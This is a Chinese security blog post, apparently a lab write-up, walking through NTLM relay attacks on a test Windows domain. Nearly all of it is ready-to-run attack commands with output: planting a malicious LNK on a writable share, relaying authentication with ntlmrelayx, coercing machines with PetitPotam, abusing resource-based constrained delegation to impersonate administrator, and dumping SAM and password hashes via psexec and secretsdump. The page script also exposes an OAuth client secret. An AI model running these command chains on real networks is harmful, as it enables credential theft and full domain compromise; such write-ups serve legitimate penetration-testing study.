<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="1y0ng" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      NtlmRelay的一些场景利用 
      
      
      |
    
     1y0ng&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon2.png">
    <link rel="icon" href="/images/favicon2.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="1y0ng's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/favicon2.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">1y0ng</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/Tool/">
          <a href="/Tool/">Tool</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">NtlmRelay的一些场景利用</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2024-09-29 14:00:18
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                    #内网
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <p><code>NtlmRelay</code>的一些场景利用</p>
<p>环境说明：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">主域控：192.168.74.138	主机名：WIN-KD9M44NUV16  域名：lyy.com</span><br><span class="line">辅域控：192.168.74.143</span><br><span class="line">域内机器 </span><br><span class="line">	win10:192.168.74.142</span><br><span class="line">	win2008:192.168.74.139</span><br><span class="line">域用户：user1/Wsx123.</span><br><span class="line">kali：192.168.74.135</span><br></pre></td></tr></table></figure>
<h2 id="共享文件利用">共享文件利用</h2>
<p>利用<a target="_blank" rel="noopener" href="https://github.com/Pennyw0rth/NetExec">nxc</a>查询SMB签名为<code>false</code>的计算机列表</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nxc smb 192.168.74.138/25 --gen-relay-list nosigning.txt</span><br></pre></td></tr></table></figure>
<p><img src="image-20240927165551828.png" alt="image-20240927165551828"></p>
<p>发现<code>192.168.74.142</code>没有开启SMB认证，尝试对其进行攻击</p>
<p>查询具有写入权限的共享文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./nxc smb 192.168.74.139 -u user1 -p &#x27;Wsx123.&#x27; -d lyy --shares</span><br></pre></td></tr></table></figure>
<p><img src="image-20240927165643843.png" alt="image-20240927165643843"></p>
<p>在<code>192.168.74.139</code>上的share文件夹对<code>user1</code>存在写入权限</p>
<p>然后我们使用<code>slinky</code>在这个共享上创建一个LNK文件指向Kali，当任何人通过文件资源管理器（而不是命令行）进入该共享，LNK文件将被触发，用户的身份验证将被发送回Kali。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nxc smb 192.168.74.139 -u user1 -p &#x27;Wsx123.&#x27; -d lyy -M slinky -o NAME=Shortcut SERVER=192.168.74.135</span><br></pre></td></tr></table></figure>
<p><img src="image-20240927170430742.png" alt="image-20240927170430742"></p>
<p>同时，我们为任何进来的身份验证设置了一个<a target="_blank" rel="noopener" href="https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py">ntlm relayx</a>侦听器，如果收到任何身份验证，ntlmrelayx可以自动打开一个与该机器的socks连接，同时拥有进入共享的用户的权限。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python ntlmrelayx.py -t 192.168.74.142 -smb2support -socks --no-dump --no-da --no-acl --no-validate-privs</span><br></pre></td></tr></table></figure>
<p><img src="image-20240927171558003.png" alt="image-20240927171558003"></p>
<p>此时我们用<code>administrator</code>用户打开共享文件夹share就会在ntlmrelayx.py上得到一个命中，并与<code>192.168.74.142</code>机器打开一个socks连接，如图所示：</p>
<p><img src="image-20240927171718692.png" alt="image-20240927171718692"></p>
<p>然后，我们可以编辑我们的proxychains配置文件，以允许我们访问到远程机器的socks连接，默认情况下使用端口1080：</p>
<p>在<code>/etc/proxychains.conf</code>中添加行<code>socks4 127.0.0.1 1080</code></p>
<p>现在使用代理链，我们可以转储sam数据，因为<code>administrator</code>身份验证是管理员的。由于我们使用的是已经通过NTLM进行身份验证的实时socks隧道，此时使用nxc时我们不需要密码。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains ./nxc smb 192.168.74.142 -u administrator -p &#x27;&#x27; -d lyy --sam</span><br></pre></td></tr></table></figure>
<p><img src="image-20240927172442717.png" alt="image-20240927172442717"></p>
<p>上面的场景中，ntlmrelayx用于将<code>administrator</code>管理员身份验证中继到1台机器，但实际上它可以将其中继到50台具有SMB签名的机器，打开了50个管理员socks连接供选择。</p>
<h2 id="RBCD-petitpotam-CVE-2019-1040">RBCD+petitpotam+CVE-2019-1040</h2>
<p>添加机器账户</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python addcomputer.py lyy.com/user1:&#x27;Wsx123.&#x27; -computer-name abcdtest -computer-pass 123456 -dc-host WIN-KD9M44NUV16 -dc-ip 192.168.74.138</span><br></pre></td></tr></table></figure>
<p><img src="image-20240925171321323.png" alt="image-20240925171321323"></p>
<p><img src="image-20240925171334822.png" alt="image-20240925171334822"></p>
<p>开启中继</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python ntlmrelayx.py -t ldap://192.168.74.138 --remove-mic --delegate-access --escalate-user abcdtest\$</span><br></pre></td></tr></table></figure>
<blockquote>
<ol>
<li><code>--remove-mic</code>：这个参数用于关闭 NTLM 中继攻击中的完整性检查。MIC（消息完整性检查）是用于验证消息在传输过程中未被篡改的机制。在某些情况下，攻击者可能会禁用 MIC 以绕过安全措施。</li>
<li><code>--delegate-access</code>：这个参数用于请求对目标的委派访问权限。在 Kerberos 认证中，委派允许一个服务以用户的身份进行身份验证，而无需用户直接参与。这可以用于横向移动或提升权限。</li>
<li><code>--escalate-user abcdctest\$</code>：这个参数后面跟着的是用户名，格式为 <code>域名\用户名</code>。在这里，<code>abdcdtest\$</code> 表示一个服务账户，攻击者试图使用这个账户来提升权限或执行其他操作。</li>
</ol>
</blockquote>
<p><img src="image-20240925171807791.png" alt="image-20240925171807791"></p>
<p>利用 PetitPotam 发起对恶意机器的 SMB 请求</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 PetitPotam.py -d &#x27;&#x27;  -u &#x27;&#x27; -p &#x27;&#x27; 192.168.74.135 192.168.74.143</span><br></pre></td></tr></table></figure>
<p><img src="image-20240925172644315.png" alt="image-20240925172644315"></p>
<p>获取ST</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 getST.py -dc-ip 192.168.74.138 lyy/abcdtest\$:123456 -spn cifs/WIN-6K645OMCGG8.lyy.com -impersonate administrator</span><br></pre></td></tr></table></figure>
<p><img src="image-20240925173705354.png" alt="image-20240925173705354"></p>
<p>加载票据使用</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">export KRB5CCNAME=administrator@cifs_WIN-6K645OMCGG8.lyy.com@LYY.COM.ccache</span><br><span class="line">python psexec.py -k -no-pass administrator@WIN-6K645OMCGG8.lyy.com -dc-ip 192.168.74.138 -target-ip 192.168.74.143</span><br></pre></td></tr></table></figure>
<p><img src="image-20240926085906489.png" alt="image-20240926085906489"></p>
<blockquote>
<ol>
<li><code>-k</code>：这个参数告诉 <code>psexec.py</code> 使用 Kerberos 认证。这意味着脚本将尝试使用 Kerberos 票证进行身份验证，而不是明文密码。</li>
<li><code>-no-pass</code>：这个参数表示不使用密码进行认证。通常与 <code>-k</code> 参数一起使用，告诉脚本你不需要提供密码，而是依赖于当前用户的 Kerberos 票证缓存。</li>
</ol>
<p>如果显示<code>[-] SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - &#123;Still Busy&#125; The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.</code>则可能是kali和域控的时区不相同，改下kali的时区然后重启就好了。</p>
</blockquote>
<h2 id="RBCD-WebDAV">RBCD+WebDAV</h2>
<p><code>WebDAV</code>，全称为<code>Web Distributed Authoring and Versioning</code>（网络分布式创作和版本控制），是一种基于HTTP的协议，用于使用户能够编辑和管理存储在远程服务器上的文件。在Windows上一般由<code>WebClient</code>运行</p>
<p>首先，我们检查域控机器，看看是否强制了LDAP签名或通道绑定，发现没有。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nxc ldap 192.168.74.138 -u user1 -p Wsx123. -M ldap-checker</span><br></pre></td></tr></table></figure>
<p><img src="image-20240929101555328.png" alt="image-20240929101555328"></p>
<p>这里为了测试，我们先开启一台机器的<code>WebClient</code>服务（WebClient 在 Workstation 系统中是默认安装的, 但需要手动启动服务, 而 Server 系统需要通过附加功能来安装并启用 WebDAV 组件）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc start WebClient</span><br></pre></td></tr></table></figure>
<p><img src="image-20240929104143372.png" alt="image-20240929104143372"></p>
<p>利用nxc探测webdav服务，发现服务开启</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nxc smb 192.168.74.142 -u user1 -p Wsx123. -M webdav</span><br></pre></td></tr></table></figure>
<p><img src="image-20240929104245699.png" alt="image-20240929104245699"></p>
<p>开启ntlmrelayx以发动RBCD攻击</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python ntlmrelayx.py -t ldap://192.168.74.138  --no-dump --no-da --no-acl --no-validate-privs --delegate-access</span><br></pre></td></tr></table></figure>
<p><img src="image-20240929105357252.png" alt="image-20240929105357252"></p>
<p>默认情况下, WebClient 仅对<code>本地内部网 (Local Intranet)</code> 或<code>受信任的站点 (Trusted Sites) 列表</code>中的目标自动使用当前用户凭据进行 NTLM 认证，所以我们可以通过responder为我们提供一个机器名<code>WIN-WAJ2BTA2JYJ</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">responder -I eth1</span><br></pre></td></tr></table></figure>
<p><img src="image-20240929105305496.png" alt="image-20240929105305496"></p>
<p>利用PetitPotam强制<code>192.168.74.142</code>机器通过HTTP向Kali进行身份验证，然后将身份验证中继到<code>192.168.74.138</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python PetitPotam.py -u user1 -p Wsx123. -d lyy.com WIN-WAJ2BTA2JYJ@80/randfile.txt 192.168.74.142</span><br></pre></td></tr></table></figure>
<p><img src="image-20240929105755405.png" alt="image-20240929105755405"></p>
<p>执行该命令后，ntlmrelayx将身份验证转发到禁用LDAP签名的<code>192.168.74.138</code>，我们在网络上增加一个随机名称为<code>VRVYHXVT$</code>的新机器账户。</p>
<p><img src="image-20240929110125892.png" alt="image-20240929110125892"></p>
<p>在域控上可以看到这个新增的机器账户</p>
<p><img src="image-20240929110238193.png" alt="image-20240929110238193"></p>
<p>接下来的过程和之前一眼，先获取票据，然后通过psexec连接控制</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 getST.py -dc-ip 192.168.74.138 lyy/VRVYHXVT\$:&#x27;KP\$unP+2c3zz*Aj&#x27; -spn cifs/DESKTOP-8N5L5EK.lyy.com -impersonate administrator</span><br></pre></td></tr></table></figure>
<p><img src="image-20240929111327744.png" alt="image-20240929111327744"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">export KRB5CCNAME=administrator@cifs_DESKTOP-8N5L5EK.lyy.com@LYY.COM.ccache</span><br><span class="line">python psexec.py -k -no-pass administrator@DESKTOP-8N5L5EK.lyy.com -dc-ip 192.168.74.138 -target-ip 192.168.74.142</span><br></pre></td></tr></table></figure>
<p><img src="image-20240929111348535.png" alt="image-20240929111348535"></p>
<p>也可以通过<a target="_blank" rel="noopener" href="https://github.com/fortra/impacket/blob/master/examples/secretsdump.py">secretsdump</a>获取用户HASH</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python secretsdump.py -k -no-pass DESKTOP-8N5L5EK.lyy.com  -dc-ip 192.168.74.138 -target-ip 192.168.74.142</span><br></pre></td></tr></table></figure>
<p><img src="image-20240929112157375.png" alt="image-20240929112157375"></p>
<p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/yokan/p/16102699.html">ntlm认证及ntlm relay攻击详解</a></p>
<p><a target="_blank" rel="noopener" href="https://exp10it.io/2023/08/%E5%9F%BA%E4%BA%8E%E8%B5%84%E6%BA%90%E7%9A%84%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE-rbcd-%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93">基于资源的约束委派-rbcd-利用总结</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/post/2024/ADCS%E7%9B%B8%E5%85%B3%E5%88%A9%E7%94%A8/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2024-09-29 14:00:18
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                        #内网
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B1%E4%BA%AB%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8"><span class="toc-text">共享文件利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RBCD-petitpotam-CVE-2019-1040"><span class="toc-text">RBCD+petitpotam+CVE-2019-1040</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RBCD-WebDAV"><span class="toc-text">RBCD+WebDAV</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        






  <div id="gitalk-container"></div>

  <script>
    function loadGitalkSuc() {
      const gitalk = new Gitalk({
        clientID: '94b011918fa9c2f8b107',
        clientSecret: '10c1ce2d3cc22cc3586cb5ce5f7b322f1ebc1c6d',
        repo: '1y0ng.github.io',
        owner: '1y0ng',
        admin: ['1y0ng'],
        id: location.pathname,
        distractionFreeMode: false
      })

      gitalk.render('gitalk-container')
    }
  </script>
  
    <link rel="stylesheet" href="/plugins/gitalk.css">
    <script type="text/javascript" src="/plugins/gitalk.min.js" onload="loadGitalkSuc(this)"></script>
  



      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2024 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + NtlmRelay%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9C%BA%E6%99%AF%E5%88%A9%E7%94%A8 + '&url=' + http%3A%2F%2Fexample.com%2Fpost%2F2024%2FNtlmRelay%25E5%259C%25BA%25E6%2599%25AF%25E5%2588%25A9%25E7%2594%25A8%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/post/2024/NtlmRelay%E5%9C%BA%E6%99%AF%E5%88%A9%E7%94%A8/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
